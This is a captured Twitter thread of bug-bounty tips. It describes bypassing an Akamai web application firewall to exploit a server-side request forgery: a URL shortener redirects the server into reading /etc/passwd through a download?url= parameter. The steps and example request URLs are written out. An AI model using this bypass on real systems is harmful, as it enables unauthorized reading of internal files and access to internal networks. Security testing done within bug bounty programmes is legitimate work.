Thread Reader

Basavaraj Banakar🇮🇳


Sep 23

7 tweets

Akamai WAF Bypass read internal files via SSRF 1. target[.]com/download?url=file:///etc/passwd (Blocked by akamai waf) #bugbountytips #bugbounty #ssrf #wafbypass #hacking

2. target[.]com disclosing internal ip in the response header ex: X-Server:

3. Now target[.]com/download?url= (weird 403)

4. Used URL Shortener bitly and shortened (Example: bit[.]ly/blahblah)

5. Now target[.]com/download?url=bit[.]ly/blahblah I got successful response i.e with html content which is same as target[.]com

6. Now used and shortened it ex: bit[.]ly/2ndblah (Because here frontend and backend both have same source code)

7. Here comes hackermode on😈 target[.]com/download?url=http://bit[.]ly/2ndblah and successfully got etc/passwd content

Basavaraj Banakar🇮🇳


n00b | ಕನ್ನಡಿಗ❤️

Follow on Twitter

Missing some tweets in this thread? Or failed to load images or videos? You can try to .